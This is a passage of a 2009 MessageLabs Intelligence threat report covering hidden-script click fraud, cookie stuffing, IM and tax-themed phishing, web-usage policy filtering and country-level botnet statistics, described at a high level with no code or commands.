4.6.11. Hidden Scripts, Fraudulent Click-Thru’s and Cookie Stuffing

It is not surprising that affiliates can combine both BHSEO and BHAM techniques to drive
more traffic to their affiliate links for money making. For example, the number of malicious
websites blocked in March 2009 rose by almost 200%, to its highest level since October
2008. Behind this sharp increase was a number of files being blocked, such as .PDFs and
images including .JPGs and .GIFs that had been injected with hidden JavaScript.
The hidden code was seemingly designed to serve-up pop-up online ads in order to generate
click-thru revenue and had been used in conjunction with a number of free online tracking
tools, where tracker codes are legitimately used to monitor visitors to particular websites.
Many of these files and images were present in spam emails that had been blocked as
potentially harmful, because of the presence of the hidden scripts, such as in figure 46,
which shows an email that contained an image with hidden JavaScript found in the image
file itself.

GIF CODE Exploit

Figure 46: Example of email with .GIF image that contained hidden JavaScript
Many similar hidden scripts were also found in other files and attachments as well, includ-
ing .PDFs and .PPTs hosted on a number of websites and were indicative that perhaps these
websites had been compromised. In many cases, the hidden JavaScripts were routinely
appended to all files on the compromised site – not only the HTML files. The only way to

45

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

detect the presence of such scripts is by analyzing the content, as the file formats was not
corrupted in the process, therefore the images were still viewable.
Click-thru’s are favored by affiliate referral schemes, and are frequently used as marketing
tools by vendors use to increase the number of visitors and potential sales to a website. Of-
ten an affiliate is paid based on the basis of how many click-thru’s are generated by visitors
from their websites and then a percentage of any subsequent sales made by anyone they
refer to the website within a certain time period. However, many such schemes are prone
to abuse by unscrupulous affiliates, such as in the previous example where compromised
websites were being used and hidden scripts were injected into existing web content.
These cookie stuffing techniques are a way of tricking vendors’ tracking systems into
accepting that an affiliate has referred someone to their websites, when in fact they have
not – often they have only visited a website under the control of the fraudulent affiliate, but
the affiliate then uses deceptive techniques to force the visitor into receiving a cookie for
the vendors website, using the affiliate’s unique ID code.
4.6.12. Analysis of Domain Registrar and CCTLD Locations
Although it is fairly common for some country-code top-level domains (CCTLDs) to be hosted
in other countries that are different to the CCTLD country code, it is certainly a much more
frequent occurrence for newer domains that have been established for malicious purposes.
Based on the IP address of the website for a domain, the location can be determined and for
newer malicious websites that have only been recently registered these are more likely not
to match the CCTLDs for which they are registered.
Top-Level Domain
.cn .in .ru .us .com .info .net
Canada 18.8% 61.6% 11.0%
Cayman Islands 10.1%
China 46.0% 33.3% 18.2% 3.2% 7.2% 1.2% 8.7%
Estonia 4.5%
France 4.8%
Germany 3.2% 6.4%
country domain is hosted in

Hong Kong 1.0%

Ireland 17.0%
Latvia 22.7% 2.4% 1.0%
Luxembourg 2.0% 2.2%
Namibia 2.4%
Netherlands 2.9% 5.0% 2.0%
Panama 22.0%
Poland 4.8% 2.1% 3.0%
Romania 9.0%
Russia 7.1% 7.0% 40.9% 4.0% 18.0%
Serbia 10.1%
Singapore 3.0%
Taiwan 4.0%
Ukraine 23.0% 6.9% 15.0%
United Kingdom 9.1%
United States 28.0% 4.5% 93.5% 20.4% 30.0% 22.0%

Figure 47: TLDs and CCTLDs based on the location of the websites linked to malware
For older, more well-established, legitimate websites that have been compromised, this
picture is very different and the CCTLD matches the expected location of the website much
more frequently.
4.6.13. Happy New Malware?
Ten years ago, on 26 March 1999, the notorious Melissa virus was created and released onto
the Internet and became perhaps the very first infamous email virus. Allegedly named after
a lap dancer whom creator David L. Smith met in Florida, Melissa sent an infected email
entitled “Here is that document you asked for ... don’t show anyone else;-)” via Microsoft
Outlook to the first 50 email addresses on the victims’ mailing lists.
Within the first hour of the outbreak, MessageLabs Hosted Email AntiVirus Service inter-

46

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

cepted 208 copies, which were very significant levels at that time. Since then, MessageLabs
Intelligence has tracked 108 different strains and more than 100,000 copies of the virus.
Melissa spread so quickly in the early stages of its outbreak that it overloaded email servers
across the globe, and despite not causing irreparable damage, the virus is widely credited
with laying the foundations for the devastating use of botnets that has since allowed cyber
criminals to spread malware so rapidly and economically. Although not on the same scale
as subsequent mass-mailing viruses such as Sobig or MyDoom, even after 10 years, Melissa
remains a feature on the threat landscape with an average of 10 copies still blocked each
month by MessageLabs Intelligence.

4.7. Instant Messaging Threats

4.7.1. Shortened URLs in IM
Shortened URLs are popular on social networking and micro-blogging websites as men-
tioned earlier, as is the use of shortened URLs for the purposes of spamming. The use
of shortened URLs in IM has also been growing since the end of 2008, although they are
still relatively rare. MessageLabs Intelligence has tracked the use of approximately 1,000
shortened URLs in over 300 million IM messages during 2009.
On average about 0.4% or 1 in 244 IM messages contain a URL of some form. Of these an
average of 0.09% (1 in 1,100) are shortened. The probability of encountering a malicious
shortened hyperlink shared over IM may still be very slim, but there are a few interesting
observations to be made: Many examples of the kinds of websites that are used in these
shortened URLs are often not malicious, but are almost certainly spam related, and some-
times for scams.
One example of this is the Sex/Dating Mobile Phone Quiz Scam where entering means the
user will continue to be charged for several months; another example downloads an .EXE
file (which may not be malicious, but highlights the potential that these shortened URLs can
lead to downloads that may soon be malware).
4.7.2. Instant Messaging Spam Increasing in 2010
As cybercriminals exploit new ways to bypass CAPTCHA technologies, instant messenger
(IM) attacks will grow in popularity. IM threats will largely be comprised of unsolicited spam
messages containing malicious links, especially attacks aimed at compromising legitimate
IM accounts. By the end of 2010, MessageLabs Intelligence predicts that one in 300 IM mes-
sages will contain a URL. Also, in 2010, Symantec predicts that overall, one in 12 hyperlinks
will be linked to a domain known to be used for hosting malware. Thus, one in 12 hyperlinks
appearing in IM messages will contain a domain that has been considered suspicious or
malicious. In mid 2009, that level was 1 in 78 hyperlinks.

4.7.3. Instant Messenger “Friend-Phishing”

As mentioned earlier in this report, spammers have for some time now been using
CAPTCHA-bypass techniques to generate multiple user accounts on well-known IM sites and
then using these accounts to spam real people with links to spam websites and malware
sites. However, a growing trend has also emerged over recent months whereby companies
are ostensibly collecting real IM user account details and passwords and using them to send
commercial messages to their friends. The curious thing here is that the way this informa-
tion will be used is spelled-out in the terms and conditions of the website.
In the example that follows, the company responsible for the domain name had also been
linked to dozens of other domains each with the same mode of operation, some of which
were first observed in March 2008. These domains have become more active in recent
months.
Further investigation suggested that the domain had ten IP addresses, and two of them
were on the same IP network, but most were located in several different countries and many
belonged to dynamic addresses, suggesting this was a botnet-hosted domain. There were
also several other domains that shared the same IP addresses and all were hosting the same
content.
The process begins when a user receives an IM from a real buddy in their contact list, this
will typically be someone they know and won’t be from a made-up IM spam account. The

47

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

IM includes some message that will entice the recipient into following the hyperlink that
follows the message. This may read something like, “phewww unbelievable, is that you???
Whoever it is… it is really similar to you lol… ” Of course the recipient may be suspicious,
but they may also be tempted to follow the link, after all it was sent to them by a trusted
friend.
The website asks the visitor to authenticate using their own personal IM user account and
password, and at this point the details are validated such that if false credentials were
presented the login process would fail. At some point later, the same account will then be
used to send spam IM messages, such as in figure 48..

LINK

Figure 48: Example of IM from buddy with link to IM phishing website

The first indication that something is wrong is when the user is logged out of their IM
service, with a notification that they have logged in from somewhere else. .
The real concern is when people share the same user account details and passwords that
they use to log into their IM client as they do for other online accounts, such as social
networking sites and those with a financial connection, including online auction sites,
payment sites and retail sites.
Finally, the “Terms & Conditions” links on the web page reveals some interesting information
about the operation and describes exactly what will happen once you hand over your IM
login account details and password, as can be seen in figure 49.
Terms of Use / Privacy Policy:

[…] By using our service/website you hereby fully authorize [redux] to send messages of a
commercial nature via Instant Messages and E-Mails on behalf of third parties via the
information you provide U.S.. This is not a "phishing" site that attempts to "trick" you into
revealing personal information. Everything we do with your information is disclosed here. If you
are under eighteen (18), you MUST obtain permission from a parent or guardian before using our
website/service.

[…] We may temporarily access your [IM] account to do a combination

of the following:

1. Send Instant Messages to your friends promoting this site.

2. Introduce new entertaining sites to your friends via Instant Messages.

Figure 49: Terms of use from phishing website

Perhaps the organization responsible for this operation believes that the presence of
these legal disclaimers provides some degree of impunity by suggesting this is a perfectly

48

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

legitimate marketing approach to their targets. In any case, it probably doesn’t really matter
to the user, because research13 suggests that only 4% of people even read these terms in the
first place and this tactic appears to be tantamount to a phishing expedition.

4.7.4. Instant Messaging Threats Intensifying

At the end of 2008, MessageLabs Intelligence identified that 1 in 200 (0.50%) hyperlinks
shared over public instant messaging (IM) applications were identified as malicious, i.e.
where the website domain had been previously identified as harboring some form of
malware designed to perform a drive-by attack on a vulnerable web browser or browser
plug-in application.
Approximately 1 in 405 (0.25%) IMs were found to contain a hyperlink of some form
(excluding disclaimers and other legal requirements appropriate to some organizations); by
mid-2009, the threat had increased further as 1 in 78 (1.28%) hyperlinks were identified as
website domains that had been used to host malicious content; suggesting approximately 1
in 80 IM users may have been exposed to a malicious hyperlink sent in an IM, each month.
4.7.5. Specialized Malware
By August 17, 2009, the deadline imposed by the Health Information Technology for Eco-
nomic and Clinical Health (HITECH) Act, the U.S. Department of Health and Human Services
(HHS) and the Federal Trade Commission (FTC) will synchronize their respective regulations
and issue interim final regulations. The HITECH Act was enacted as part of the American
Recovery and Reinvestment Act of 2009 and imposes notification requirements in the event
of security breaches related to protected health information (PHI).
As millions of government dollars are currently being invested in the digitization and
protection of personal health records, medicine and technology are more intersected than
ever. Organizations across the healthcare sector are feeling the pressure to comply with
regulations such as the HITECH Act and rightfully so.
MessageLabs Intelligence has detected a growing need to safeguard against threats target-
ing the Healthcare sector. Spam destined for the healthcare sector has risen during 2009
and levels may rise above 90% in 2010. Email-borne malware attacks against the sector
have more than doubled since the start of 2009. Specialized malware targeting the health-
care sector are expected to rise in 2010, with attacks intended to focus on stealing personal
medical records within the healthcare sector.

4.8. Malware Predictions for 2010

4.8.1. Increasingly Specialized Malware in 2010
Highly specialized malware was uncovered14 in 2009 that was aimed at exploiting certain
ATMs, indicating a degree of insider knowledge about their operation and how they could be
exploited. Expect this trend to continue in 2010, including the possibility of malware target-
ing electronic voting systems, both those used in political elections and public telephone
voting, such as that connected with reality television shows and competitions.

4.8.2. Antivirus is Not Enough

With the rise of polymorphic threats and the explosion of unique malware variants in 2009,
the industry is quickly realizing that traditional approaches to antivirus, both file signatures
and heuristic/behavioral capabilities, are not enough to protect against today’s threats. We
have reached an inflection point where new malicious programs are actually being created
at a higher rate than good programs. As such, we have also reached a point where it no
longer makes sense to focus solely on analyzing malware. Instead, approaches to security
that look to ways to include all software files, such as reputation-based security, will
become key in 2010.

4.8.3. Social Engineering as the Primary Attack Vector

More and more, attackers are going directly after the end user and attempting to trick them
into downloading malware or divulging sensitive information under the auspice that they
are doing something perfectly innocent. Social engineering’s popularity is at least in part
spurred by the fact that what operating system and Web browser rests on a user’s computer
13 Ponemon Institute LLC :“The Ignored Risk of Employees’ Use of Internet Applications”, October 15, 2008
14 https://www.trustwave.com/downloads/spiderlabs/Trustwave-Security-Alert-ATM-Malware-Analysis-
Briefing.pdf

49

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

is largely irrelevant, as it is the actual user being targeted, not necessarily vulnerabilities
on the machine. Social engineering is already one of the primary attack vectors being used
today, and Symantec estimates that the number of attempted attacks using social engineer-
ing techniques is sure to increase in 2010.

4.8.4. Rogue Security Software Vendors Escalate Their Efforts

In 2010, expect to see the propagators of rogue security software scams take their efforts
to the next level, even by hijacking users’ computers, rendering them useless and holding
them for ransom. A less drastic next step, however, would be software that is not explicitly
mali-cious, but dubious at best. For example, Symantec has already observed some rogue
antivirus vendors selling rebranded copies of free third-party antivirus software as their own
offerings. In these cases, users are technically getting the antivirus software that they pay
for, but the reality is that this same software can actually be downloaded for free elsewhere.

4.8.5. Social Networking Third-Party Applications Will be the Target of Fraud

With the popularity of social networking sites poised for another year of unprecedented
growth, expect to see fraud being leveraged against site users to grow. In the same vein,
expect owners of these sites to create more proactive measures to address these threats.
As this occurs, and as these sites more readily provide third-party developer access to their
APIs, attackers will likely turn to vulnerabilities in third-party applications for users’ social
network-ing accounts, just as we have seen attackers leverage browser plug-ins more as
Web browsers themselves become more secure.
4.8.6. Fast Flux Botnets Increase
Fast flux is a technique used by some botnets, such as the Storm botnet, to hide phishing
and malicious Web sites behind an ever-changing network of compromised hosts acting as
proxies. Using a combination of peer-to-peer networking, distributed command and control,
web-based load balancing and proxy redirection, it makes it difficult to trace the botnets’
original geo-location. As industry counter measures continue to reduce the effectiveness of
traditional botnets, expect to see more using this technique being used to carry out attacks.

50

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

5. FRAUD, SCAMS AND PHISHING: TOP THREATS OF 2009

5.1. Phishing Summary
In 2009, the proportion of phishing attacks in email traffic was 1 in 325.2 (0.31%) emails,
compared to 1 in 244.9 (0.41%) in 2008. More than 161 billion email phishing attacks were
in circulation in 2009.

5.2. New Techniques, Tactics, Changes etc

In the first half of 2009, the credit crisis generated many new finance-related attacks as
spammers and criminals sought to take advantage of the uncertainty surrounding the global
economic downturn. And throughout the year, phishing activity continued in waves, often
focusing on financial institutions in one particular geography, before moving onto another
target elsewhere. More phishing activity, particularly in the first half of the year, was
linked to the increased availability of phishing kits and the use of compromised, legitimate
domains to host many phishing sites.

2009 Phishing Rate

1 in 325.2
1501-2500
Min February: 1 in 190.4
Max September: 1 in 437.1

1 in 1 in 325.2
1 in 315.4 1 in 179.5
338.3
1 in 244.9

2005 2006 2007 2008 2009

Annual 2009 (Jan - Nov)

At the end of 2008 and in the early months of 2009, phishing may have appeared more
attractive and potentially lucrative to the bad guys, perhaps in part owing to the follow-on
effect of recent disruption of the McColo ISP and partly because of the increased avail-
ability of phishing toolkits online. Some toolkits, such as the ZeuS toolkit fell into the public
domain and became plagued by hidden backdoor Trojans, whereas before it had been the
preserve of cyber criminals who were trading it on the underground economy. Freely avail-
able web hosting services continued to be used to host many phishing websites, and some
providers became better at identifying and responding to this type of abuse.
The ZeuS toolkit can be used to create highly customized botnets, phishing attacks and
identify theft and other malicious activities. Lowering the barrier to entry, many such
toolkits became more widely available, and often they had hidden backdoor Trojans that
their new users were unaware of, enabling other cyber criminals to capitalize on their use.
Phishing activity over the summer months fluctuated more widely, much of the heightened
activity earlier in the year that was linked to phishing toolkits had declined and fewer phish-
ing attacks targeted social networking websites. However, over the course of the year there
had been a rise in the proportion of phishing attacks in non-English languages, with French
and Italian becoming increasingly popular for these types of attacks. As seen in figure 50,
during the second half of 2009, there was a decline in phishing activity when measured as
a proportion of all malware and phishing combined, over the Summer months, perhaps as
the availability of phishing toolkits declined, returning to normal levels as the year drew to a
close.

51

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

60%

50%

40%

30%

20%

10%

0%
Jun Jul Aug Sep Oct Nov

Figure 50: Trend showing phishing as a proportion of malware and phishing combined
In figure 51, the chart shows that the most frequently targeted industry is the banking and
finance sector, particularly relating to credit-card fraud.
Other
Government
Commerce
Auction / Other Finance

89% 92% 88% 90% Bank / Credit Card

86%
75%

Jun Jul Aug Sep Oct Nov

Figure 51: Industries most frequently targeted in phishing attacks

There was a surge in Government related phishing in October 2009, this was owing to large
runs of phishing campaigns related to the HMRC in the U.K. and the IRS in the U.S.. Phishing
as a proportion of all malware and phishing combined averaged approximately 69.9% for
2009, and dipped towards the end of the year, accounting for approximately 46% of all
malware and phishing attacks.
The number of individual brands targeted by phishing increased significantly during July
2009, when 702 brands were identified. The average number of brands per month during
the year was 591, and remained fairly stable throughout the latter half of the year.
Since the start of the global credit crisis, there had been a number of phishing and fraud-
related activities particularly related to banks that had received a great deal of publicity
around recent mergers and acquisitions. Many phishing campaigns at the time were seeking
to capitalize on these uncertain times by tailoring their messages around the media cover-
age and news. Consumers may have been more susceptible to these types of scams at a time
when many would not have been surprised to receive messages from unfamiliar banks, and
they may have been more inclined to act on the instructions relating to their own domestic
bank.
In March 2009, a number of mails that claimed to be from the U.K. Border Agency were
identified that were clearly spoofed. The ‘Reply-To:’ header pointed to a free hosted webmail
account and the mail was itself sent from another online webmail provider. It also included
a free U.K. personal redirect telephone number (prefixed with +44 704), a technique often
favored by some phishing and advance-fee fraud scams, which should always arouse
suspicion in an email of this nature. Moreover, this potential scam is quite topical with the
U.K. government planning to introduce a surcharge of £50 GBP for migrant workers on visas.
5.2.1. No Rebate from Phishing with Taxing Demands
The Cutwail botnet was also kept busy in 2009 sending phishing emails relating to tax
rebates, switching between sending huge volumes of IRS (Internal Revenue Service, U.S.)
phishing emails to one of the largest ever HMRC (Her Majesty’s Revenue and Customs,

52

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

U.K.) phishing runs. Similar phishing emails purporting to originate from the Australian Tax
Office were also in circulation, masquerading in the same way. In each case, the emails were
essentially identical, using the same templates with only the organization name changed.
Part of the email address was taken from the To: field and used within the body of the email;
the user name to the left of the @ was used in the parts of the email to lend credence to the
legitimacy of the scam.
90%

80%
IRS Phishing as % of all phishing
HMRC Phishing as % of all phishing
70%

60%

50%

40%

30%

20%

10%

0%
Jan 09 Feb 09 Mar 09 Apr 09 May 09 Jun 09 Jul 09 Aug 09 Sep 09 Oct 09

Figure 52: Chart showing IRS and HMRC phishing trend

Figure 52 illustrates that peaks of activity occurred around the beginning of the tax year
in May and the time when most tax deadlines are set for tax returns to be completed in
October. In the U.S., the IRS extended its limited amnesty program for U.S. taxpayers with
undeclared income on foreign accounts until 15 October, but most tax returns were ex-
pected to be filed by 15 April. In the U.K. and Australia, the deadline was 31 October.
Interceptions of IRS phishing emails peaked on 10 October, accounting for 67% of all
phishing emails in that 24-hour period whilst HMRC phishing emails accounted for 81% of
all phishing interceptions at its peak on 13 October.
5.2.2. Phishing and the Value of Compromised Webmail Accounts
Although the Financial sector was often the most common target of phishing attacks, online
services such as web-based email were also popular targets in 2009. One reason for this was
the widespread use of email addresses now being used to authenticate to many different
sites, especially social networking sites, online retailers and auction sites.
People are frequently encouraged to use strong, often difficult to remember, passwords.
And the temptation is sometimes to store these in the browser, which helpfully offers to
remember it for the next time. Although this “auto-fill” information is encrypted before it is
stored, the encryption key is the URL of the webpage itself, so all the attacker would need to
do is make use of the browser history in order to decipher the encrypted passwords. There
are freely available legitimate tools that allow a user to recover forgotten passwords in this
way, and the bad guys are certainly able to utilize similar tactics across botnets, such as
ZeuS.
Once compromised, whether through a phishing attack or harvested from a bot-infected
PC, a web-based email address may be used to reset a password on a number of other sites,
including social networking sites. The password reminder or reset instructions would be
sent to the email address of the account holder, allowing the bad guys access to the ac-
count. Some people often share the same email addresses and passwords on many sites and

53

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

the issue here is that it is not just an email that can become compromised when someone
divulges those details. Other aspects of a person’s online life may then be susceptible as
well.
Since the widespread reports online and in the media of many users’ webmail account
details ending up in the public domain, the expectation has been to see an increase in spam
emails originating from these accounts. However, MessageLabs Intelligence did not observe
any significant increase in spam originating from the domains identified in these reports.

5.3. Phishing Predictions for 2010

5.3.1. URL Shortening Services Become the Phisher’s Best Friend
Because users often have no idea where a shortened URL is actually sending them, phishers
are able to disguise links that the average security conscious user might think twice about
clicking on. MessageLabs Intelligence is already seeing a trend toward using this tactic to
distribute misleading applications and we expect much more to come. Also, in an attempt to
evade antispam filters through obfuscation, expect spammers to leverage shortened URLs
shorteners to carry out their own evil deeds.

5.4. Advanced-Fee Fraud and the 2010 Soccer World Cup

The 2010 World Cup, taking place in South Africa had already precipitated a small number
of spam messages relating to the event in late 2009. These were often advance-fee fraud or
419-style scams that required the target to pay a sum of money in advance before receiving
their alleged lottery winnings.

Figure 53: Advance-fee fraud scam relating to the 2010 Soccer World Cup

5.5. Policy-Based Controls and the Enemy Within

The total number of records containing sensitive personal information involved in security
breaches in the U.S. since January 2005 was 341,742,628 15. Although the need to secure
business computer systems and online activities may seem obvious, it can be rather
discomforting when IT budgets are tight, often requiring significant investments of time and
expertise to implement correctly.
One important aspect to this is managing employee behavior, and having the right balance
of acceptable usage policies and technology controls so as not to inhibit the optimal working
15 Privacy Rights Clearinghouse: http://www.privacyrights.org/ar/ChronDataBreaches.htm

54

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

environment. This may include awareness raising, education and internal training to ensure
that employees understand their responsibilities online, especially as many organizations
are embracing social networking and micro-blogging services.
Some businesses may operate with a fairly unrestrictive open policy, where access is not
limited, but guidelines are set that govern what is or is not acceptable. Managing the risks
associated with employee Internet usage plays a vital role in any effective IT security policy.
Often the first measures are to undertake a risk assessment in order to clearly identify what
needs safeguarding, why and what happens if it is not protected adequately. This process
will look closely at the most likely risks facing the business and what action needs to be
taken in order to mitigate them.
The risks from exposure to web-based drive-by attacks have been discussed in this report,
as well as the risks from targeted malware, phishing, spear-phishing and other similar
tactics employed by cyber criminals.
Requirements to protect data extend beyond the potential impact from loss of reputation
and customer turnover, but are also needed to meet the demands of regulatory and legal
requirements. Many countries have enacted data protection legislation and in the U.S. more
than 35 States have enacted security breach notification laws.
In the U.S., the Health Insurance Portability and Accountability Act (HIPAA) calls for severe
civil and criminal penalties for noncompliance, including fines of up to $25,000 for multiple
violations of the same standard in one calendar year and fines as high as $250,000 and/or
imprisonment for up to ten years for the misuse of health information. Similarly, the Gramm
Leach Bliley Act (GLBA) brings stiff penalties, including civil action brought by the U.S.
Attorney General and fines levied to the organization of up to $100,000.
For any size of business, email is one of the organization’s most critical assets. Not only
do employees need access to their email accounts for their day-to-day jobs, but organiza-
tions must also manage historical copies of email correspondence in order to comply with
regulatory and legal requirements in order to conduct efficient e-discovery if required by
the authorities. It is for these reasons that many more companies are seeking reliable email
archiving solutions.
When used properly, encryption can be a powerful tool to help ensure secure delivery and
access to sensitive information. Unfortunately, just because information is encrypted does
not mean it has been approved to leave your organization. Likewise, sensitive information
that is permitted to exit your organization isn’t always encrypted.
It is important to ensure that any solution employed by the business includes features that
enable the monitoring and prevention of the transmission of data in violation of encryption
policies. It is important to have visibility into and control over encrypted information that
hasn’t been approved for external distribution.
5.5.1. Policy Controls for Web Access
To minimize legal risk and to ensure that the Internet and web access can be used as an
effective business tool, organizations need effective tools for monitoring behavior and to
enforce Acceptable Usage Policies that govern distribution of inappropriate content or to
mandate the use of encryption where appropriate. Such policies will govern how employees
are to conduct themselves online, particularly in the use of social networking, blogging and
micro-blogging websites. The most frequently triggered policy rules can be seen in figure
54, based on the time of day the rule was triggered.
streaming media

downloads
chat personals dating
blogs/forums
adult/sexually explicit
games

6 am 7 am 8 am 9 am 10 am 11 am noon 1 pm 2 pm 3 pm 4 pm 5 pm 6 pm
Figure 54: MostAdjusted
frequently
to local blocked
time policy rules by time of day (local time)

55

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Analysis of policy-based filtering traffic blocked in 2009 reveals the following:

• Ads and Popups account for almost two-thirds (66%) of blocked sites;
• Streaming Media, about one eighth (12.5%) of blocks;
• Games/Chat/Downloads/Social Networking/Blogs/Forums, 1-8%;
• Adult/Sexually Explicit, 1.4%;
• 87.4% of all blocks are made during the working day 8am-6pm;
• 32.6% of all blocks are made during lunchtime 12-2pm;
• Busiest hours by far for blocks are 12-2pm;
• Chat is about four times more popular in the morning, than in the afternoon, especially
late morning. Perhaps users are discussing lunch plans or exchanging stories from the
previous evening’s events;
• Weapons, Adult/Sexually Explicit, Hacking, Games, Violence all have a relatively high
number of blocks outside of normal working hours, compared with other categories. For
example, Adult Sexually Explicit: 68% of blocks within working hours, 32% outside of
working hours. The other four categories mentioned are similarly split;
• Adult/Sexually explicit has a peak of activity around lunchtime like most other categories,
but also a second peak between midnight and 2am;
• Web-based email is consistently flat, users seemingly attempt to visit web-based email
websites at all times during the working day. There is no expected peak during lunchtime
hours;
• News sites show a tremendous burst at lunchtime. This shows that one of the most
popular ways for users to spend their lunch break is catching up on the day’s news;
• There are number of categories that are very popular during lunch time periods, such as:
News, Politics, Fashion, Social Networking;
Interestingly, another activity that seems very popular during lunchtime hours is when
users are checking their bank accounts online. Accordingly, a peak in blocks from phishing
and fraud is noted at these times (44% of Phishing/Fraud website blocks occur during
lunchtime).

56

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

6. GLOBAL AND BUSINESS: TOP THREATS OF 2009

6.1. Exposure to Cyber Threats – Likelihood of Joining a Botnet
6.1.1. Broadband Users and Botnet Threats
66% of global bots are found in just 31 countries, the countries with the least risk include
Japan, Belgium, Australia; these all have very few bots considering how many broadband
users there are.
0% 5% 10% 15% 20% 25%

Brazil 13.9%
United States
of America
India
Russia
Vietnam
Poland
China
Argentina
Romania % of global broadband users
Spain
% of global bot PCs
Italy
United Kingdom
Germany
Mexico
France
Czech Republic
Portugal
Greece
Netherlands
Taiwan
Canada
Japan
Philippines
Australia
Switzerland
Austria
Sweden
Denmark
Malaysia
Norway
Belgium

Figure 55: Chart showing global share of broadband users vs. bots
The most likely countries for broadband users to become infected with a bot are Vietnam,
Brazil, Romania, Argentina, as seen in figure 56. Broadband users in the U.K. are 25% more
likely to be infected with botnet malware than in the U.S.. In Germany broadband users are
33% more likely to become infected than in the U.K., and 70% more likely than users in the
U.S..

57

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

0% 1% 2% 3% 4% 5% 6% 7% 8% 9%

Vietnam
Brazil
Romania
Argentina
Poland
India
Russia
Czech Republic
Portugal
Greece
Spain
Philippines
Mexico
% of broadband users with a bot PC
Italy
United States
of America
Austria
Netherlands
United Kingdom
Taiwan
Switzerland
Malaysia
Denmark
Germany
France
Norway
Sweden
China
Canada
Australia
Belgium
Japan

Figure 56: Chart showing likelihood of broadband users’ exposure to botnet threats

58

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

7. CONCLUSIONS
As this reports shows, the security landscape in 2009 has been shaped predominantly by
the application of botnets to the criminal enterprise, with an evolutionary step-change
taking place in the malware technology used to establish and control them. The shift
towards using standard web-based HTTP protocols, even in some cases with the manipula-
tion of social media content, has made it much harder to disrupt these criminal networks, as
evidenced in the report.
The use of generic malware droppers like Bredolab and Conficker, to “drop” other software
programs, malware and spyware onto victims computers ensures that the bad guys can
remain agile and are able to switch over and adapt their attack vectors and revenue streams
with minimal delay. We have yet to see the full potential of botnets like Conficker, keeping
their cards close to their chest in 2009; it remains to be seen whether their hand will be
played in 2010.
In terms of malware, there were more variants intercepted in 2009, with a 23% increase in
malware variants year-on-year. Greater levels of sophistication and efficiency brought about
larger numbers of spam campaigns in 2009, with over 21 million different types of spam
runs, more than double the amount seen in 2008.
The global financial crisis presented spammers and fraudsters with huge opportunities for
social engineering scams and enabled them to prey on the naïve and more vulnerable mem-
bers of society. World events, festivities and news stories also provided a rich backdrop from
which the spammers and cyber criminals could adapt their themes throughout the year.
Malware and spam in 2009 relied more on the use of the Web than in previous years, as
attacks swung more towards social networking environments, micro-blogging websites
and shortened-URLs, compromised websites and account profiles created using CAPTCHA-
breaking technology were all being used to host spam or malicious content. The use of such
in spam campaigns and malware attacks has been one aspect of this, and the pattern is
expected to continue in 2010 as email will continue to be the primary social engineering tool
for these attacks, and especially for targeted malware attacks.
 

59

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Credits
Paul Wood
Executive Editor
MessageLabs Intelligence Senior Analyst, Symantec Hosted Services

Dan Bleaken
Malware Data Analyst, Symantec Hosted Services

Mat Nisbet
Malware Data Analyst, Symantec Hosted Services

Jason Zhang
Malware Analyst, Symantec Hosted Services

Nicholas Johnston
Senior Anti-Spam Engineer, Symantec Hosted Services

Martin Lee
Senior Software Engineer, Symantec Hosted Services

Daren Lewis
Analyst, Symantec Hosted Services

About MessageLabs Intelligence

MessageLabs Intelligence is a respected source of data and analysis for messaging security
issues, trends and statistics. MessageLabs Intelligence provides a range of information on
global security threats based on live data feeds from our control towers around the world
scanning billions of messages each week. All MessageLabs Intelligence reports and analysis
is available at www.messagelabs.com/intelligence

About Symantec
Symantec is a global leader in providing security, storage and systems management
solutions to help consumers and organizations secure and manage their information-driven
world. Our software and services protect against more risks at more points, more com-
pletely and efficiently, enabling confidence wherever information is used or stored. More
information is available at www.symantec.com.

60

www.messagelabs.com
[email protected]